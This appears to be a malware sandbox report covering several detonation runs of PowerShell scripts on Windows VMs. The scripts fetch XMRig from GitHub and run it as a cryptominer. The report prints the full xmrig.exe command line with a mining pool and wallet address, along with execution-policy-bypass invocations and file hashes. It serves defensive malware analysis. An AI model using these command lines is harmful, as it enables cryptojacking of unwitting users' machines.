memory/1472-99-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-100-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-101-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-102-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-103-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-104-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-105-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-106-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-107-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-108-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-109-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-110-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-111-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-112-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-113-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-114-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-115-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-116-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-117-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

memory/1472-118-0x00007FF6E2530000-0x00007FF6E3163000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:17

Platform

win7-20240221-en

Max time kernel

1558s

Max time network

1559s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Network

N/A

Files

memory/2184-4-0x000007FEF5C4E000-0x000007FEF5C4F000-memory.dmp

memory/2184-7-0x000007FEF5990000-0x000007FEF632D000-memory.dmp

memory/2184-8-0x000007FEF5990000-0x000007FEF632D000-memory.dmp

memory/2184-9-0x000007FEF5990000-0x000007FEF632D000-memory.dmp

memory/2184-10-0x000007FEF5990000-0x000007FEF632D000-memory.dmp

memory/2184-6-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

memory/2184-5-0x000000001B7F0000-0x000000001BAD2000-memory.dmp

memory/2184-11-0x000007FEF5990000-0x000007FEF632D000-memory.dmp

memory/2184-12-0x000007FEF5990000-0x000007FEF632D000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:19

Platform

win10-20240404-en

Max time kernel

1791s

Max time network

1771s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 14.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp

Files

memory/164-4-0x00007FF9DE723000-0x00007FF9DE724000-memory.dmp

memory/164-5-0x00000225755A0000-0x00000225755C2000-memory.dmp

memory/164-8-0x00007FF9DE720000-0x00007FF9DF10C000-memory.dmp

memory/164-9-0x0000022575860000-0x00000225758D6000-memory.dmp

memory/164-10-0x00007FF9DE720000-0x00007FF9DF10C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uxevpgru.uwt.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/164-25-0x00007FF9DE720000-0x00007FF9DF10C000-memory.dmp

memory/164-48-0x00000225759E0000-0x00000225759F2000-memory.dmp

memory/164-61-0x0000022575630000-0x000002257563A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2596-90-0x000002338E660000-0x000002338E680000-memory.dmp

memory/2596-91-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-92-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/164-93-0x00007FF9DE723000-0x00007FF9DE724000-memory.dmp

memory/164-94-0x00007FF9DE720000-0x00007FF9DF10C000-memory.dmp

memory/2596-95-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-96-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-97-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-98-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-99-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-100-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-101-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-102-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-103-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-104-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-105-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-106-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-107-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-108-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-109-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-110-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-111-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-112-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-113-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-114-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-115-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-116-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-117-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-118-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-119-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-120-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-121-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-122-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-123-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-124-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-125-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-126-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-127-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-128-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-129-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-130-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-131-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-132-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-133-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-134-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-135-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-136-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-137-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-138-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-139-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-140-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-141-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-142-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-143-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-144-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-145-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-146-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-147-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-148-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-149-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-150-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-151-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-152-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-153-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-154-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

memory/2596-155-0x00007FF766EA0000-0x00007FF767AD3000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:37

Platform

win10v2004-20240508-en

Max time kernel

1789s

Max time network

1765s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 211.143.182.52.in-addr.arpa udp

Files

memory/4448-0-0x00007FFD85903000-0x00007FFD85905000-memory.dmp

memory/4448-7-0x0000025EEC250000-0x0000025EEC272000-memory.dmp

memory/4448-11-0x00007FFD85900000-0x00007FFD863C1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zvzatrc3.dil.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4448-12-0x00007FFD85900000-0x00007FFD863C1000-memory.dmp

memory/4448-14-0x00007FFD85900000-0x00007FFD863C1000-memory.dmp

memory/4448-15-0x0000025EEC640000-0x0000025EEC652000-memory.dmp

memory/4448-16-0x0000025EEC280000-0x0000025EEC28A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1436-47-0x000001DF40B30000-0x000001DF40B50000-memory.dmp

memory/1436-48-0x000001DF42330000-0x000001DF42350000-memory.dmp

memory/1436-49-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/4448-50-0x00007FFD85903000-0x00007FFD85905000-memory.dmp

memory/1436-52-0x000001DF42370000-0x000001DF42390000-memory.dmp

memory/1436-51-0x000001DF42350000-0x000001DF42370000-memory.dmp

memory/1436-53-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/4448-54-0x00007FFD85900000-0x00007FFD863C1000-memory.dmp

memory/4448-56-0x00007FFD85900000-0x00007FFD863C1000-memory.dmp

memory/1436-55-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-57-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-58-0x000001DF42350000-0x000001DF42370000-memory.dmp

memory/1436-59-0x000001DF42370000-0x000001DF42390000-memory.dmp

memory/1436-60-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-61-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-62-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-63-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-64-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-65-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-66-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-67-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-68-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-69-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-70-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-71-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-72-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-73-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-74-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-75-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-76-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-77-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-78-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-79-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-80-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-81-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-82-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-83-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-84-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-85-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-86-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-87-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-88-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-89-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-90-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-91-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-92-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-93-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-94-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-95-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-96-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-97-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-98-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-99-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-100-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-101-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-102-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-103-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-104-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-105-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-106-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-107-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-108-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-109-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-110-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-111-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-112-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-113-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-114-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-115-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-116-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-117-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

memory/1436-118-0x00007FF7468F0000-0x00007FF747523000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:05

Platform

win11-20240426-en

Max time kernel

1797s

Max time network

1779s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

